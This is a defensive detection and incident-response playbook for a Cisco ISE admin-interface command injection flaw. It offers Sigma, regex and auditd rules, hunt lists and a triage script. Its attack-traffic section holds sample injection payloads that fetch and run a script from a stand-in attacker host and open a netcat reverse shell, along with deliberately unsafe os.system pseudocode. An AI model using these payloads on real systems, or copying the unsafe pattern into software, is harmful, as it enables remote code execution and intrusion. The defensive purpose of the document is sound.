CVE-2026-20147: Cisco ISE Command Injection Detection and Response Playbook

What It Is

CVE-2026-20147 is a CWE-78 OS Command Injection in the Cisco ISE and Cisco ISE-PIC admin web interface. The vulnerability exists in an HTTP endpoint accessible to authenticated administrators. Because the application fails to sanitize user-supplied input before passing it to an operating system shell, an attacker with any admin-level credential can inject arbitrary OS commands. Those commands execute as root. There is no privilege escalation chain required. The injected command runs with the highest privileges on the appliance from the first request. The NVD entry assigns a CVSS base score of 9.9 (Critical). In single-node ISE deployments, exploitation can also render the node unavailable, creating a secondary denial-of-service condition that prevents new endpoint authentication until the node is restored.

CVE Identifier

CVE-2026-20147

CWE Classification

CWE-78: Improper Neutralization of Special Elements used in an OS Command

CVSS Base Score

9.9 / 10.0 (CRITICAL)

Published

2026-04-15T17:17:02.410

Attack Vector

Network (authenticated, any admin role)

Why "Read-Only Admin Counts" Matters

Most organizations treat read-only admin accounts as low-risk. They exist for monitoring dashboards, pulling reports and checking node health. Security teams hand them out freely because the assumption is straightforward: read-only means the account cannot change anything. That assumption is wrong here.

CVE-2026-20147 does not require write privileges within the ISE application. It requires a valid admin session. The vulnerable HTTP endpoint processes the request before the application-layer authorization check distinguishes between admin roles. Any admin session cookie works. A read-only admin session. A full admin session. A super-admin session. The injection point does not care about the role attached to the credential.

If an attacker compromises ANY admin credential, even the monitoring-only account your SOC team uses, they own the box.

This matters because read-only accounts are often protected with weaker controls than full admin accounts. They get shared across teams. They get excluded from MFA requirements. They get stored in shared password managers without rotation policies. They get used from jump boxes that are not hardened. In environments with distributed admin access across multiple ISE deployment nodes, the attack surface is broader than the CVSS score implies. Every read-only account is a viable entry point. Audit every admin account on every ISE node, not just the super-admin credentials.

Practical steps: inventory every ISE admin account across all nodes. Determine which accounts have active sessions. Rotate credentials on all of them. Enable MFA for every admin tier, including read-only. If you cannot confirm that no read-only credential was compromised, treat the node as potentially exploited and follow the triage process in Section 6.

What Attack Traffic Looks Like

Disclaimer: The following patterns are illustrative and sanitized. They demonstrate the vulnerability class (CWE-78) for defensive purposes. This is NOT a working exploit. Endpoint names are redacted. Payloads are generic metacharacter examples that apply to any OS command injection vulnerability.

The attack targets an administrative API endpoint on the ISE web interface. The attacker needs a valid session (cookie and CSRF token) and submits a POST request where one of the parameter values contains shell metacharacters. The server-side code passes that parameter value to an OS command without sanitization.

Illustrative HTTP request:

POST /admin/API/<redacted-endpoint> HTTP/1.1
Host: ise.victim.local
Cookie: JSESSIONIDSSO=<valid-admin-session>
X-CSRF-Token: <valid>
Content-Type: application/x-www-form-urlencoded

name=node01;curl%20http://attacker.example/x.sh|bash%20%23

In this example, the name parameter is expected to contain a node identifier. The attacker appends a semicolon to terminate the legitimate command, then injects a curl pipeline that downloads and executes a remote script. The %23 (#) comments out whatever the application appends after the parameter value.

Illustrative pseudocode (NOT actual Cisco code):

# BAD: user input flows directly to shell
import os
name = request.form.get("name")
os.system(f"/opt/CSCOcpm/bin/some-tool --target {name}")

# What the OS actually executes:
# /opt/CSCOcpm/bin/some-tool --target node01;curl http://attacker.example/x.sh|bash #

The semicolon terminates the first command. Everything after it runs as a separate command with the same privileges as the parent process, which in ISE's case is root.

Generic metacharacter payloads to hunt for in logs:

value;id > /tmp/proof
value && /usr/bin/curl -s http://attacker/x.sh | sh
value | nc attacker 4444 -e /bin/sh
value`id`
value$(id)
value%0aid          # newline injection

URL-encoded equivalents that will appear in access logs:

Character	URL-Encoded	Purpose
;	%3B	Command separator
|	%7C	Pipe to second command
&&	%26%26	Conditional execution
$()	%24%28 ... %29	Command substitution
`	%60	Backtick command substitution
newline	%0a	Newline injection

Any of these characters appearing in ISE admin API request parameters should be treated as suspicious. Legitimate ISE admin operations do not include shell metacharacters in node names, group names or configuration values.

How to Detect It

Detection for CVE-2026-20147 operates at four layers: web request analysis via Sigma rules, log review via regex, process anomaly detection on the ISE appliance and IOC hunting across the network. Deploy all four. No single layer catches everything.

5a. Sigma Rule

This Sigma rule detects HTTP requests to ISE admin API endpoints containing shell metacharacters. Deploy it in your SIEM against ISE web access logs, reverse proxy logs or WAF logs that capture ISE admin traffic.

title: Cisco ISE Admin API - Shell Metacharacters in Parameter
id: 8a2c1f4a-1b2c-4d5e-9f01-cve202620147
status: experimental
description: >
  Detects POST/GET to ISE admin API containing shell metacharacters
  in parameters, indicative of CVE-2026-20147 exploitation attempts.
logsource:
  product: cisco_ise
  service: admin_webui
detection:
  selection_path:
    cs-uri-stem|contains:
      - '/admin/API/'
      - '/admin/rs/'
  selection_payload:
    cs-uri-query|re: '(%3B|%7C|%26%26|%60|%24%28|%0a|;|\||&&|`|\$\()'
  selection_post_body:
    cs-post-body|re: '(%3B|%7C|%26%26|%60|%24%28|%0a|;|\||&&|`|\$\()'
  condition: selection_path and (selection_payload or selection_post_body)
fields:
  - cs-username
  - c-ip
  - cs-uri-stem
  - cs-uri-query
level: high

Deployment notes: The rule assumes your log source captures the full URI query string and POST body. If your reverse proxy or WAF truncates POST bodies, you lose visibility on the selection_post_body condition. Confirm your logging infrastructure captures full request parameters before relying on this rule alone. If you forward ISE admin logs to Splunk, Elastic or Microsoft Sentinel, convert this Sigma rule using the sigma-cli tool for your backend.

5b. Regex for Log Review

If you do not have a Sigma-compatible SIEM or need to run a quick manual hunt across raw log files, use this regex pattern against ISE admin access logs:

(?i)(/admin/(api|rs)/)[^\s]*?(%3b|%7c|%26%26|%60|%24%28|%0a|[;|`]|\$\()

This pattern matches any request to /admin/API/ or /admin/rs/ paths that contains shell metacharacters in either raw or URL-encoded form. Run it with grep -P or your preferred regex engine against web server access logs, ISE admin audit logs and any WAF or reverse proxy logs that sit in front of the ISE admin interface.

Example usage:

grep -Pi '(/admin/(api|rs)/)[^\s]*?(%3b|%7c|%26%26|%60|%24%28|%0a|[;|`]|\$\()' \
  /opt/CSCOcpm/logs/admin/admin-access.log

Any match warrants immediate investigation. False positives from this pattern are rare because legitimate admin API requests do not contain semicolons, pipes or backticks in parameter values.

5c. Process Anomaly Detection

Command injection means the attacker's payload runs as a child process of the ISE application server. ISE runs on a Java/Tomcat stack under the CSCOcpm service. Under normal operation, this process does not spawn interactive shells or network utilities.

Watch for these child-process relationships:

parent: java (CSCOcpm)
child:  /usr/bin/curl | /usr/bin/wget | /bin/nc | /bin/bash -c | /bin/sh -c | /usr/bin/python -c

On Linux-based ISE appliances, you can detect this with auditd rules, EDR process telemetry or a simple process monitoring script. If your organization uses CrowdStrike, SentinelOne, Carbon Black or Microsoft Defender for Endpoint on the ISE node (where supported), create a detection rule that alerts when the Java process spawns any of these binaries.

For auditd, the relevant rule monitors execve syscalls from the CSCOcpm process tree:

# Add to /etc/audit/rules.d/ise-command-injection.rules
-a always,exit -F arch=b64 -S execve -F ppid_is_ancestor=CSCOcpm -k ise_cmd_injection

Any process spawn from the Tomcat/Java process tree that includes curl, wget, nc, ncat, bash -c, sh -c, python -c or perl -e is a confirmed indicator of exploitation. There is no legitimate operational reason for the ISE web application to shell out to these utilities in response to an admin API request.

5d. IOC Hunt List

Beyond real-time detection, run these hunts across your environment to identify post-exploitation activity:

• Outbound HTTP/HTTPS from ISE management IP to non-Cisco destinations. The ISE management interface should only communicate with Cisco update servers, your SIEM/syslog collectors and configured RADIUS/TACACS clients. Any outbound HTTP to an unrecognized IP or domain is suspicious.
• New files in /tmp, /var/tmp, /opt/CSCOcpm/temp/ not owned by the cpm user. Exploitation typically drops payloads or staging scripts into world-writable directories. Check file ownership, creation timestamps and contents.
• Unexpected SSH keys in ~root/.ssh/authorized_keys. Persistence via SSH key injection is a standard post-exploitation technique. Compare the current authorized_keys file against your known-good baseline.
• New local OS accounts in /etc/passwd. Any user account that was not provisioned through your change management process warrants immediate investigation.
• New ISE admin accounts created outside change windows. Check the ISE admin audit trail for account creation events. Correlate timestamps against your change calendar.
• Audit trail gaps in /opt/CSCOcpm/logs/localStore/. Attackers who gain root access often clear or truncate log files to cover their tracks. Gaps in the log timeline or files with suspiciously recent modification timestamps relative to their expected log rotation schedule indicate tampering.

Run these hunts on every ISE node in your deployment. In distributed deployments with multiple Policy Administration Nodes (PANs) and Policy Service Nodes (PSNs), an attacker who compromises one node can use ISE's built-in replication and trust relationships to move laterally to other nodes.

What to Do If You Think You're Hit

If any of the detection methods above return positive results, or if you have reason to believe a Cisco ISE admin credential was compromised, collect forensic artifacts before taking any destructive action. Do not reboot the node. Do not reinstall. Do not "clean up" suspicious files. Preserve everything first.

Run this triage collection script as an admin user on the affected ISE node:

tar czf /tmp/ise-triage-$(hostname)-$(date +%s).tgz \
  /opt/CSCOcpm/logs/localStore \
  /opt/CSCOcpm/logs/admin \
  /var/log/messages /var/log/secure \
  /etc/passwd /etc/shadow \
  /root/.bash_history \
  /home/*/.bash_history 2>/dev/null

This collects ISE application logs, OS authentication logs, user account files and shell history files into a single compressed archive. The 2>/dev/null suppresses errors for files that may not exist on your specific ISE version.

After collection:

1. Copy the triage archive off the ISE node to a forensic workstation or secure evidence store. Do not analyze artifacts on the compromised system.
2. Capture a full disk image if your incident response process requires it. The triage archive above covers the most time-sensitive artifacts, but a disk image preserves deleted files and filesystem metadata that may be relevant.
3. Rotate every admin credential on every ISE node in the deployment. Do this from a trusted workstation, not from the ISE admin interface on the potentially compromised node.
4. Check for lateral movement. Review authentication logs on systems that trust the ISE node: RADIUS clients, TACACS+ clients, Active Directory or LDAP servers that ISE authenticates against.
5. Patch the affected node before returning it to production. If you cannot confirm the node is clean, rebuild it from a known-good image and restore configuration from backup.

If you need help analyzing these artifacts, call Sherlock Forensics at 604.229.1994. We maintain Cisco ISE forensic imaging and analysis capabilities and can turn around an initial assessment within 24 hours of receiving artifacts.

Patch and References

Patch availability and fixed versions are documented in the Cisco Security Advisory. Do not rely solely on this playbook for patch guidance. Check the vendor advisory directly for the authoritative list of fixed releases.

• NVD: CVE-2026-20147
• MITRE: CVE-2026-20147
• Cisco Security Advisory: cisco-sa-ise-rce-traversal-8bYndVrZ
• CWE-78: Improper Neutralization of Special Elements used in an OS Command
• CISA Known Exploited Vulnerabilities Catalog — check for active exploitation status

Sherlock Forensics provides Cisco ISE security assessments and incident response for organizations that run ISE in production. If you need an independent assessment of your ISE deployment's exposure to CVE-2026-20147, or if you need forensic analysis of a suspected compromise, contact our team or call 604.229.1994.